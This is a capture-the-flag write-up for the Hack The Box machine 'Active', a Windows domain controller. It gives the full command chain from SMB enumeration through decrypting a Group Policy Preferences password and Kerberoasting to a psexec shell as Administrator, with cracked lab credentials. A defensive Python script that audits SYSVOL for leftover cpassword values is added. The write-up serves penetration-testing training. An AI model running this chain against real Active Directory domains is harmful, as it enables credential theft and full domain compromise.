Machine: https://app.hackthebox.com/machines/148
Enumeration
Port Scanning
- Getting the open ports using nmap
nmap -p- -sS -n -Pn --min-rate 5000 10.10.10.100
- Enumerating services and versions, and running some common scripts
nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389 -sCV -n -Pn --min-rate 5000 10.10.10.100 -oN Targeted
Result
Domain name: active.htb
Windows Server version: windows_server_2008:r2:sp1 (old)
LDAP
- We can use ldapsearch to collect some info (without valid credentials we can only query the base object, so we continue with the enumeration)
ldapsearch -H ldap://10.10.10.100 -x -s base
DC Name: dc$@ACTIVE.HTB
SMB
- Let's try a null session to list the shares with smbclient
smbclient -L //10.10.10.100 -N
Result
- To read the share permissions we can use crackmapexec or nxc (NetExec)
crackmapexec smb 10.10.10.100 -u '' -p '' --shares -d active.htb
Result
- Let's go into the Replication share
smbclient //10.10.10.100/Replication -N
Result
Exploitation
- Looks like we have a replica of the SYSVOL folder. As the Windows version is old, we can try to get the cached GPP credentials from
\\active.htb\Replication\Policies\*\Machine\Preferences\Groups\Groups.xml
mget \\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
Result
- Now we can use a tool like gpp-decrypt to decrypt the cpassword value
gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
Result
Credentials: active.htb\SVC_TGS:GPPstillStandingStrong2k18
- If we test the credentials with crackmapexec, they are valid
crackmapexec smb 10.10.10.100 -u 'active.htb\SVC_TGS' -p 'GPPstillStandingStrong2k18'
Result
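- Defender's note (added example, not part of the original writeup): this works because the cpassword attribute in GPP XML files is encrypted with a key Microsoft published, so anyone who can read SYSVOL can recover it; MS14-025 stops new entries being created, but old ones stay until removed. The Python script below audits a SYSVOL copy for leftover cpassword attributes using a constructed Groups.xml sample; it only reports findings and does not decrypt, and the sysvol_root path is an assumption.

```python
"""Audit a SYSVOL copy for Group Policy Preference files that still carry a
cpassword attribute (the cached credential abused in this writeup).
Added example for this page; it only reports findings, it does not decrypt."""
import xml.etree.ElementTree as ET
from pathlib import Path

# GPP XML files that can carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attribute that names the account in each of those file types.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def find_cpasswords(xml_text, source="<memory>"):
    """Return one finding per element with a non-empty cpassword attribute."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        cpw = elem.get("cpassword")
        if not cpw:          # absent or empty: nothing cached here
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "")
        findings.append({"file": source, "element": elem.tag,
                         "account": account, "cpassword_len": len(cpw)})
    return findings


def scan_sysvol(sysvol_root):
    """Walk a SYSVOL (or Replication share) copy and collect all findings.
    sysvol_root is whatever local path the share was copied to (assumption)."""
    findings = []
    for path in Path(sysvol_root).rglob("*.xml"):
        if path.name not in GPP_FILES:
            continue
        try:   # GPP files are usually UTF-8 with a BOM; utf-8-sig strips it
            findings.extend(find_cpasswords(path.read_text(encoding="utf-8-sig"), str(path)))
        except ET.ParseError:
            pass   # malformed file: skip it rather than abort the audit
    return findings


# Constructed Groups.xml in the shape of the one found in the Replication share;
# the cpassword value is a placeholder, not the real blob.
SAMPLE_GROUPS_XML = """<Groups>
 <User name="active.htb\\SVC_TGS">
  <Properties action="U" cpassword="CONSTRUCTED_CPASSWORD_BLOB"
              userName="active.htb\\SVC_TGS"/>
 </User>
</Groups>"""

if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(f"{f['file']}: cached password for {f['account']} in <{f['element']}>")
```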
Enumeration 2
LDAP
- Using the credentials
ldapsearch -H ldap://10.10.10.100 -x -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b 'DC=active,DC=htb'
or
ldapdomaindump 10.10.10.100 -u 'active.htb\svc_tgs' -p 'GPPstillStandingStrong2k18'
Result
Bloodhound
- Using bloodhound-python and BloodHound to get a better view of the AD environment
bloodhound-python -d active.htb -u 'svc_tgs' -p 'GPPstillStandingStrong2k18' -c ALL -ns 10.10.10.100 --dns-tcp
SMB
- Now we can access other shares
crackmapexec smb 10.10.10.100 -u 'active.htb\SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
Result
- We are able to enumerate users by brute-forcing RIDs
crackmapexec smb 10.10.10.100 -u 'active.htb\SVC_TGS' -p 'GPPstillStandingStrong2k18' --rid-brute
or
# to get only user names
crackmapexec smb 10.10.10.100 -u 'active.htb\SVC_TGS' -p 'GPPstillStandingStrong2k18' --rid-brute | grep -oP '(?<=ACTIVE\\)(\S+)(?= \(SidTypeUser\))'
Result
- The “Users” share is quite interesting: inside the “Default” folder we find a file named “NTUSER.DAT”. This type of file contains recently accessed items and credentials and can be parsed with a tool like RegRipper, but there is no useful information in it
smbclient //10.10.10.100/Users -U active.htb/SVC_TGS%GPPstillStandingStrong2k18 -c 'mget "Default"/*'
Result
Exploitation
- We can try to get a list of SPNs (an identifier of a service instance; Kerberos uses it to associate a service with a sign-in account) using impacket-GetUserSPNs, and then crack the resulting ticket hashes
impacket-GetUserSPNs active.htb/svc_tgs:GPPstillStandingStrong2k18 -save -output GetUserSPN.out
Result
- Now we can crack the hashes with John the Ripper
john GetUserSPN.out --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs
Result
Credentials:
Administrator:Ticketmaster1968
- Testing the credentials
crackmapexec smb 10.10.10.100 -u 'active.htb\Administrator' -p 'Ticketmaster1968' -x 'whoami /priv'
Result
Getting Access
- We can use psexec.py to get an interactive shell
psexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Result